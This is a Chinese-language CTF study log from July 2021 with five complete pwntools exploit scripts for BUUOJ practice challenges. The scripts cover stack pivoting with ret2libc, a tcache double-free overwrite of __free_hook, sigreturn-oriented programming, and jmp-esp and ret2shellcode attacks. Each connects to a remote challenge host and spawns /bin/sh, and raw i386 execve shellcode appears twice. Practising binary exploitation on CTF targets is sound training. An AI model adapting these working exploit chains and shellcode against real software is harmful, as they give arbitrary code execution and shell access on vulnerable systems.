21.07.28学习总结
Column: July 28, 2021
Tags: learning experience
11:00-12:00: buu刷题: ciscn_2019_final_3我写得不好, 写成要爆破的了
14:25-16:30: buu刷题: ciscn_2019_es_7: 和ciscn_2019_s_3一模一样
ciscn_2019_s_9: 写一段汇编就好了
picoctf_2018_shellcode: ret2shellcode, 我傻逼了
actf_2019_babystack: 栈迁移和ret2libc+csu, 稍微复杂点的常规题
后面一直在玩, 我忏悔
actf_2019_babystack
#!/usr/bin/env python
# coding=utf-8
# Write-up script for the BUUOJ practice challenge ACTF_2019_babystack.
# Python 2 only: it concatenates str with the bytes returned by p64() and
# calls .next() on a generator.
from pwn import *
#sh=process('./ACTF_2019_babystack')
sh=remote('node4.buuoj.cn',28442)
elf=ELF('./ACTF_2019_babystack')
#context.log_level='debug'
context.binary=elf
# Absolute path to one specific glibc build; every libc offset used below is
# only meaningful for this exact libc, so the path must be adjusted elsewhere.
libc=ELF('/home/thu1e/ctf/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
#libc=elf.libc
# Gadget addresses inside the challenge binary (fixed 0x400000 base, i.e. no
# PIE assumed -- confirm against the binary). pop_rsi_r15 is not used below.
leave_ret=0x0400a18
pop_rdi=0x0400ad3
pop_rsi_r15=0x0400ad1
csu_2=0x0400AC6
csu_1=0x0400AB0
ret=0x0400709
#gdb.attach(sh, '''b *0x400ad3''')
sh.recv()
# Requested input length: 0xe0 = the 0xd0-byte frame built below plus the
# saved rbp and return address appended to it.
sh.sendline(str(0xe0))
# The service prints where the input buffer lives ("... at 0x..."); that
# address is reused as the new stack after the pivot.
sh.recvuntil('at ')
read_in_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
log.success('read in addr: '+hex(read_in_addr))
# Stage-1 ROP chain, placed at the start of the input buffer:
#   puts(got['puts'])          -> leaks a libc address
#   csu_2 / csu_1 gadget pair  -> presumably read(0, read_in_addr+0x60, 0x100)
#                                 to pull in stage 2 (the csu gadget's register
#                                 order is not shown here -- verify)
payload=p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])\
+p64(csu_2)+p64(0)+p64(0)+p64(1)+p64(elf.got['read'])+p64(0x100)\
+p64(read_in_addr+0x60)+p64(0)+p64(csu_1)
# Pad to the saved-rbp slot (0xd0), point rbp into the buffer and return via
# leave;ret so the chain above becomes the stack (the "栈迁移" from the notes).
payload+=p8(0)*(0xd0-len(payload))+p64(read_in_addr-8)+p64(leave_ret)
sh.recv()
sh.send(payload)
sh.recvuntil('Byebye~\n')
# puts emits the 6 significant bytes of the pointer; pad to 8 before unpacking.
leak_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=leak_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
sys_addr=libc_base+libc.sym['system']
# libc.search() returns a generator; .next() is the Python 2 spelling.
bin_sh_addr=libc_base+libc.search('/bin/sh').next()
# Stage 2, read into read_in_addr+0x60: a ret sled, then system("/bin/sh").
# The trailing 'wwwwwwww' is filler; its purpose is not stated in the notes.
payload2=p64(ret)*12+p64(pop_rdi)+p64(bin_sh_addr)+p64(sys_addr)+'wwwwwwww'
sh.send(payload2)
sh.interactive()
ciscn_2019_final_3
#!/usr/bin/env python
# coding=utf-8
# Write-up script for the BUUOJ practice challenge ciscn_2019_final_3 (heap).
# Python 2 only: str literals are concatenated with bytes from p64()/p16().
from pwn import *
#sh=process('./ciscn_final_3')
sh=remote('node4.buuoj.cn',29129)
elf=ELF('./ciscn_final_3')
# libc shipped with the challenge, resolved relative to the working directory.
libc=ELF("./libc/libc.so.6")
context.binary=elf
#context.log_level='debug'
def add(idx, size, content='/bin/sh\x00'):
    """Drive menu option 1: allocate slot `idx` of `size` bytes holding `content`.

    Pending output is drained first; the three numeric fields are sent one per
    line and `content` is sent with send() (no trailing newline).  The default
    content is the string "/bin/sh".
    """
    sh.recv()
    for field in ('1', str(idx), str(size)):
        sh.sendline(field)
    sh.send(content)
def remove(idx):
    """Drive menu option 2: free slot `idx`, draining output before each line."""
    for line in ('2', str(idx)):
        sh.recv()
        sh.sendline(line)
# --- leak the heap base from the "gift" printed after the first allocation ---
add(0, 0x78)
sh.recvuntil('gift :')
# 0xe70 is the observed distance from the heap start to the printed pointer
# (layout-specific; re-check if the allocation sequence changes).
heap_addr=int(sh.recvuntil('\n').split('\n')[0], 16)-0xe70
log.success('heap_addr: '+hex(heap_addr))
# Fill slots 1-4 with 0x18-byte chunks and slots 5-13 with 0x78-byte chunks.
for i in range(4):
    add(i+1, 0x18)
for i in range(9):
    add(i+5, 0x78)
# Slot 0 is freed twice (double free); slots 14 and 15 then reuse that chunk
# and store heap_addr+0xe70+0x40 in it, which the allocator reads as a free-list
# link (presumably tcache, per the "tc" note below -- confirm for this libc).
remove(0)
remove(0)
payload1=p64(heap_addr+0xe70+0x40)
add(14, 0x78, payload1)
add(15, 0x78, payload1)
# Slot 16 lands at heap_addr+0xe70+0x40; the 8th qword written there (0x481)
# replaces a neighbouring chunk's size field (which chunk is layout-specific).
payload2=p64(0)*7+p64(0x481)
add(16, 0x78, payload2)
remove(1) #unsorted: with the forged 0x481 size this free goes to the unsorted bin
remove(3) #tc 0x20: this one lands in the 0x20 tcache list
add(17, 0x38)
# Partial overwrite of a libc pointer: keep the low 12 bits of __free_hook and
# guess 0xf for the randomised nibble.  This is the "爆破" from the notes -- the
# run only succeeds when the guess matches, otherwise rerun.
payload3=p16(((libc.sym['__free_hook'])&0xfff)+0xf000)
add(18, 0x38, payload3)
add(19, 0x18)
add(20, 0x18, p64(0))
# The gift printed after this allocation is now the (guessed) __free_hook address.
sh.recvuntil('gift :')
free_hook_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
libc_base=free_hook_addr-libc.sym['__free_hook']
log.success('libc_base: '+hex(libc_base))
# Second double free, this time to write libc's system into __free_hook.
add(21, 0x28)
remove(21)
remove(21)
add(22, 0x28, p64(free_hook_addr))
add(23, 0x28)
add(24, 0x28, p64(libc_base+libc.sym['system']))
# Slot 23 holds add()'s default content "/bin/sh"; freeing it invokes the hook.
remove(23)
sh.interactive()
ciscn_2019_es_7
#!/usr/bin/env python
# coding=utf-8
# Write-up script for the BUUOJ practice challenge ciscn_2019_es_7 (SROP); the
# notes say it is identical to ciscn_2019_s_3.  Python 2 only (str + bytes
# concatenation, str(frame)).
from pwn import *
#sh=process('./ciscn_2019_es_7')
sh=remote('node4.buuoj.cn',25041)
elf=ELF('./ciscn_2019_es_7')
context.binary=elf
# Blocks until a key is pressed (debugging leftover); drop it for unattended runs.
pause()
# Overflow: 0x10 bytes of buffer followed by main's address twice -- the first
# presumably fills the saved-rbp slot and the second the return address
# (layout inferred), so the program runs again after echoing the stack.
payload1='a'*0x10+p64(elf.sym['main'])+p64(elf.sym['main'])
sh.send(payload1)
# Skip the first 0x20 echoed bytes, then read a 6-byte stack pointer.
sh.recv(0x20)
leak_stack=u64(sh.recv(6).ljust(8, '\x00'))
sh.recv()
log.success('leak_stack: '+hex(leak_stack))
# 0x138 is the observed distance from the leaked pointer to the input buffer.
read_addr=leak_stack-0x138
# Forged sigreturn frame: rax=59 (execve on x86-64), rdi -> the second copy of
# "/bin/sh" in payload2, rdx/rcx zeroed, rip -> 0x400517 (presumably a syscall
# gadget -- confirm in the binary).
frame=SigreturnFrame()
frame.rip=0x400517
frame.rax=59
frame.rdi=read_addr+8
frame.rdx=0
frame.rcx=0
# 0x4004DA is expected to leave rax=15 (rt_sigreturn) before the syscall at
# 0x400517 -- not shown here, verify.  str(frame) serialises the frame (Py2).
payload2='/bin/sh\x00'*2+p64(0x04004DA)+p64(0x400517)+str(frame)
sh.send(payload2)
sh.interactive()
ciscn_2019_s_9
#!/usr/bin/env python
# coding=utf-8
# Write-up script for the BUUOJ practice challenge ciscn_s_9 (32-bit).
# Python 2 only: the byte-string literal below is a plain str.
from pwn import *
#sh=process('./ciscn_s_9')
sh=remote('node4.buuoj.cn',25983)
elf=ELF('./ciscn_s_9')
context.binary=elf
context.log_level='debug'
# 21-byte i386 shellcode; the bytes spell "/bin//sh" and end in
# mov al,0xb; int 0x80, i.e. it looks like execve("/bin//sh").
shellcode1='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
# Second stage assembled by pwntools (arch taken from context.binary): move
# esp back over the frame to where shellcode1 sits and jump there.
shellcode2='''
sub esp, 0x28;
jmp esp;
'''
shellcode2=asm(shellcode2)
# Layout: shellcode1 padded to 36 bytes (9 dwords), the return address
# 0x8048554 (presumably a `jmp esp` gadget -- confirm), then shellcode2, which
# runs with esp pointing just past the return address.
payload=shellcode1+p8(0)*(9*4-len(shellcode1))+p32(0x8048554)+shellcode2
#gdb.attach(sh)
sh.recv()
# sendline appends '\n' after the payload.
sh.sendline(payload)
sh.interactive()
picoctf_2018_shellcode
#!/usr/bin/env python
# coding=utf-8
# Write-up script for the BUUOJ practice challenge PicoCTF_2018_shellcode
# (ret2shellcode per the notes: the input itself is executed).  Written for
# Python 2 like the other scripts here, so the str literal carries raw bytes.
from pwn import *
#sh=process('./PicoCTF_2018_shellcode')
sh=remote('node4.buuoj.cn',29938)
elf=ELF('./PicoCTF_2018_shellcode')
context.binary=elf
context.log_level='debug'
# Same 21-byte i386 execve("/bin//sh") shellcode as in the ciscn_s_9 script.
shellcode2='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload=shellcode2
sh.recv()
# sendline appends '\n' after the shellcode.
sh.sendline(payload)
sh.interactive()